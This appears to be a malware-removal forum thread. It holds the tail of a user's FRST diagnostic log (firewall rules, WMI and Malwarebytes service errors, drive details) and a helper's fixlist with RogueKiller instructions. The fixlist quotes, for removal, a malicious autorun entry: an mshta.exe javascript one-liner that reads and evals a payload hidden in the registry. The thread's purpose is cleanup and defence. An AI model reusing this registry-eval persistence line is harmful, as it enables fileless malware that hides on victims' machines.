FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [TCP Query User{EAEAB11E-0749-492A-83F8-9E619C0825FB}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [UDP Query User{3A908214-3ACB-45F3-87BB-034C922C2A9D}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [{BC279C92-F389-439A-AA3C-F8FC24E7E3E0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{54C5FE03-560A-42F0-A953-CC57545F85F2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{09DF48B2-2698-410B-B67C-DB382410B87B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [{89F025E4-A12F-4D64-8F4E-65A58D8FF1E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [TCP Query User{5A0AE274-1115-456E-8097-7259AE6A531D}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [UDP Query User{15BE3688-275A-40F9-8987-65CFDE79CC41}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [{6A1EE22B-EFB5-403F-96B8-92BF6419D6D3}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{4F8E8B43-EDDE-423A-AFB4-558A6797AA1B}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{587354FE-5AA4-40B2-8BE8-3F068F603006}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{2F20DB6C-39DB-42F5-B0EA-93724F169BF7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{CEE996FE-EC7E-4B5B-83A4-8D572D4710AC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{66553191-FBFE-4728-8CDE-F8A61645C7E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{BEC5AC23-37B2-40FD-8357-3AEC0079BE6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{D8EFC4A0-1905-4C93-9620-035D8AA25691}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{ACD083CA-B56C-4A63-AC29-54CF6A0CD632}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [{C888B48B-D53E-439A-AC80-145CA44D4737}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [TCP Query User{E3430B03-1B85-4352-B782-0FA31716971E}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [UDP Query User{9283DBC8-33C0-43B5-9651-F441DC55A6DF}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [TCP Query User{105F511A-3CF6-48F6-AD6C-051E9FEF4601}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [UDP Query User{41437AF0-DE88-4AFA-A0CB-DAA1B25D218B}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [{90F7FC5D-4BDC-4E25-81CF-7F277BC7091B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{DBC3A232-DF3B-4592-AAD9-5AD7C9E8EF26}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{11C7801C-EA50-48C3-B975-C7808EBB34BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [{A402D5BB-ACD3-4564-8602-D1C3AFE8A5FC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [TCP Query User{90E2740D-4865-43C6-91D4-B44837FB7951}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [UDP Query User{91DD21ED-6B7D-4517-ABA8-25131C27A725}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [{0E9497B1-EDF3-4BDA-84E8-C4AF819F2B1F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [{DE8F4F0F-22D5-4E28-9D99-3E79A12D25D0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [TCP Query User{392BB40D-09A3-46AE-B483-4A87F354BBE3}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [UDP Query User{02BF2D2B-EBEA-47F5-B4FA-A51CBA9A9C83}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [TCP Query User{94065ED6-5B78-4044-AE30-8E49C3C21237}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [UDP Query User{27CA16C0-9AB9-4376-AE22-9AA13C815A01}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [TCP Query User{FF88AE80-179E-4787-99D1-9D9601F0F888}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{DE54AA93-CF4F-4466-966B-16CCAAB5E2AF}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{1A5EA0B5-372C-4636-865C-96EB70C2B9F8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{0289A623-6B29-4123-AFAD-83CC04D6E3D1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{094AA815-F657-443A-BD7D-E8BF39CB1875}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [{E6B49A1F-10BF-4C9D-939D-AF1B9D814811}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [TCP Query User{1B0D9DFE-155E-4872-9EA3-EB0B754A22E9}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [UDP Query User{9BB74597-A81A-4634-BF7E-27D90AAE1515}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [TCP Query User{A7B37CFC-0381-42BE-827A-63D6A4C34FC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [UDP Query User{639643C1-BDF4-477C-AD00-3FB55B221BC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [{2CAC80C4-1DD7-4ED9-AAC9-FA728E9C64C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{59E06B2C-F0B8-4FD2-8C95-E33BA71B7A52}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [TCP Query User{49813E33-F982-4C58-AABE-7AE5DDBB53B7}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [UDP Query User{97BB371E-37DD-4871-A9B2-479DDB116DAB}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [TCP Query User{AE8E1853-0B69-458C-A91B-357C96D672CA}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [UDP Query User{6309873B-0312-49FF-93AF-7FC0CEE92B2B}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [TCP Query User{2B66DABB-08DB-4347-B883-42E57A1977E7}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [UDP Query User{B796F551-898A-414D-9130-087E8CDA4764}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [{943F2851-ECFB-4B76-8DB5-790A4F3A2A60}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{8C09611D-DED5-4A47-9CAD-6B5D30F07DEF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [TCP Query User{B57AE43D-9BD7-4625-9167-9682B1214B8E}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [UDP Query User{F54F1B03-C911-4118-898E-C4C6741ED54C}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [{A53DA5D6-B330-4B94-9BAD-CBFA322598D2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{0989A382-7FB7-49BD-8948-BB4D18E829E3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{86ECB8A3-9E4D-4BA6-8848-DF1BC1D6BD38}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{FB8EF655-CB2D-40B2-BC0A-EE99B096DB04}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{1AABF3A0-0D09-40C2-A9AA-0CB0D8D57BF0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [{D9690832-509B-45D6-9409-03836DE16213}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [TCP Query User{4D4A7CFE-E3AD-42FE-9ABC-F15ACA432415}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [UDP Query User{B43EA068-17FF-4825-80F1-B7BEA12DBA14}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [{E12C1E12-8918-47BF-9BF0-BB81766D03BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [{A2AE5D14-6FD2-41C1-9980-F2E7E63537F2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [TCP Query User{EAEA4C7A-39C4-439B-A5A3-BC1B39F3E633}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [UDP Query User{AE9B677E-82BF-4BD9-A500-9799B4349C4F}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [{C07BD8B9-20CF-40B2-A390-051F5AF605EF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [{7E02B52F-A3D5-4771-94A8-9E1BC9A92AE0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [TCP Query User{0BC64E8E-D097-4302-8DE7-C52133F3F820}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{3F6D9C6D-0D88-42B3-A45B-22E3876F89E7}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{41295780-229B-4A41-8874-FA27D76D9D18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{7FEB6C09-A3FC-4FE8-8C2F-A73DF3A26029}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{AE43EF82-F6F7-4C66-9E0E-04BA99ADC5A3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [{72A961A6-6F51-4295-8377-36F54B3EDD2D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [TCP Query User{51297500-255C-4308-A33D-A59A0226532F}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [UDP Query User{C086CD1D-6E88-4B53-8234-63A7F7094C27}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [{B0F4256D-3EB3-4DDB-9525-A5CC400DBC01}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{FD789251-9926-4417-AB50-A72ED2F1CCED}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{478551DD-BFAA-4D54-B66F-4825510EC57B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{E87E1A1E-46C6-4F95-A1E6-4CB2F188F244}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{4F8620B0-3C73-4A37-BE73-1E679DB228A9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{830B508E-2878-4305-82C9-B9B9ADF9AD8D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{ACB155F9-DBDA-4D65-B643-959BE30D4175}] => (Allow) C:\Program Files\Vivaldi\Application\vivaldi.exe
FirewallRules: [TCP Query User{597DC14B-49DB-40B6-A24A-E3D9953A457D}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{A9C2F1E3-849E-4D06-93ED-F0D6A0381D0A}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{6E206845-F48F-4619-A3DA-A5516D9D4C5A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{CE39CD5A-E51C-48D9-A1E7-2DA4AEF0C6CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{5D35B3A2-F05A-47E7-A169-9FB82F430BF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{14725769-536B-4335-A537-4BBAD8646C91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{2FFEA717-74A2-4877-89D2-B30E836B1AEE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{9EC8F931-3B33-4C1E-8707-F3D9F5D2C37B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{87FC258F-5BEE-4C60-9620-2854B57C3376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{6692C423-96D3-48B0-BE61-0A685AA7C369}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [TCP Query User{746EE4C5-88A1-49CA-AE82-C024362EC325}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [UDP Query User{1CB765AF-56AD-4340-96E5-5AF7DDC35300}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [{6AA353F1-7DDF-490A-B825-0C9CF5C0597D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{2253BB91-25A5-41A5-A8B1-51264D44C1DC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{F128730D-D7BE-467C-A4BB-0C43215DC4C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{92BD8855-E433-4E7C-9DA1-BC4ADC152C43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{4DF2E569-34C8-428A-A8C6-689A8D3132A5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{180A7648-B41B-49EC-9970-3A15A5246B34}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{CC32B82F-7235-40CF-890F-473BCA9F601D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{45300479-8F32-4A67-916B-F7D53A9DFB52}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{FB9D5CC2-2B07-4B7F-9F63-36452DB69316}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{5B525BF6-E027-4A85-98DB-0B69127E01F5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{E8FF906C-0588-47BE-96E9-0BE363415543}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{986BA986-DD80-4802-9A0A-D9A8D1431284}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{CE43BA91-078E-4D0B-AB12-53C5C0B5839A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

Could not list restore points
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Could not list Devices. Check "winmgmt" service or repair WMI.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/19/2018 04:51:42 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 11:13:40 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 11:12:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 11:12:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 10:24:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:26:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:16:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 08:35:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (03/19/2018 04:57:25 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:24 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:22 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:20 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:19 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:18 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.


==================== Memory info ===========================

Processor: Intel® Core™ i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 9%
Total physical RAM: 16321.73 MB
Available physical RAM: 14735.58 MB
Total Virtual: 32641.63 MB
Available Virtual: 31027.39 MB

==================== Drives ================================

Drive c: (Structure) (Fixed) (Total:238.37 GB) (Free:90.7 GB) NTFS
Drive d: (Entertainment) (Fixed) (Total:1863.01 GB) (Free:192.43 GB) NTFS
Drive h: (MUSIK) (Removable) (Total:3.77 GB) (Free:2.5 GB) FAT32

\\?\Volume{0a950ecd-376b-11e3-98f7-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: 37EB0193)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=238.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 37EB0198)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (Size: 3.8 GB) (Disk ID: CAD4EBEA)
Partition 4: (Active) - (Size=3.8 GB) - (Type=0B)

==================== End of Addition.txt ============================

 

 

 




#4 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 19 March 2018 - 01:37 PM

Hi,

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
CloseProcesses:

U3 ayj9xjuk; C:\Windows\System32\Drivers\ayj9xjuk.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
C:\Windows\System32\Drivers\ayj9xjuk.sys

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe

cmd: ipconfig /flushdns
cmd: IPCONFIG /release
cmd: IPCONFIG /renew

cmd: sc qc winmgmt
cmd: sc queryex winmgmt
cmd: sc queryex rpcss
cmd: sc qc rpcss
cmd: sc queryex RpcEptMapper
cmd: sc qc RpcEptMapper
cmd: sc queryex DcomLaunch
cmd: sc qc DcomLaunch
cmd: sc queryex bfe
cmd: sc qc bfe

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or above, right-click the program file and select "Run as Administrator"
  • Accept the user agreements.
  • Execute the scan and wait until it has finished.
  • If a window opens to explain what [PUM's] are, read about it.
  • Click the RogueKiller icon on your taskbar to return to the report.
  • Click open the Report
  • Click Export TXT button
  • Save the file as ReportRogue.txt
  • Click the Remove button to delete the items in RED
  • Click Finish and close the program.
  • Locate the ReportRogue.txt file on your Desktop and copy/paste the contents in your next.
=======

Download Farbar's Service Scanner utility
